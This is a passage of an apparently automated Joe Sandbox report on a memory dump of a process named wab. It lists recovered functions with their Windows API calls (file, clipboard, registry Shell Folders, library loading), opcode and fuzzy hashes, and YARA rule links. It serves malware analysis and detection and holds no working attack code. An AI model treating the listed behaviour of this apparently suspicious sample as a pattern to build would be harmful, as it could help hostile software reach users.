                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: EnumNamesResource
                                                • String ID:
                                                • API String ID: 3334572018-0
                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004095FC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                • String ID:
                                                • API String ID: 3655998216-0
                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00445426
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                • String ID:
                                                • API String ID: 1828521557-0
                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                • memcpy.MSVCRT ref: 00406942
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@FilePointermemcpy
                                                • String ID:
                                                • API String ID: 609303285-0
                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID:
                                                • API String ID: 2081463915-0
                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                • String ID:
                                                • API String ID: 2136311172-0
                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@
                                                • String ID:
                                                • API String ID: 1936579350-0
                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EmptyClipboard.USER32 ref: 004098EC
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                • GetLastError.KERNEL32 ref: 0040995D
                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                • GetLastError.KERNEL32 ref: 00409974
                                                • CloseClipboard.USER32 ref: 0040997D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                • String ID:
                                                • API String ID: 2565263379-0
                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadMessageProc
                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                • API String ID: 2780580303-317687271
                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EmptyClipboard.USER32 ref: 00409882
                                                • wcslen.MSVCRT ref: 0040988F
                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                • memcpy.MSVCRT ref: 004098B5
                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                • CloseClipboard.USER32 ref: 004098D7
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                • String ID:
                                                • API String ID: 2014503067-0
                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32 ref: 004182D7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                • String ID: OsError 0x%x (%u)
                                                • API String ID: 403622227-2664311388
                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                • OpenClipboard.USER32(?), ref: 00411878
                                                • GetLastError.KERNEL32 ref: 0041188D
                                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
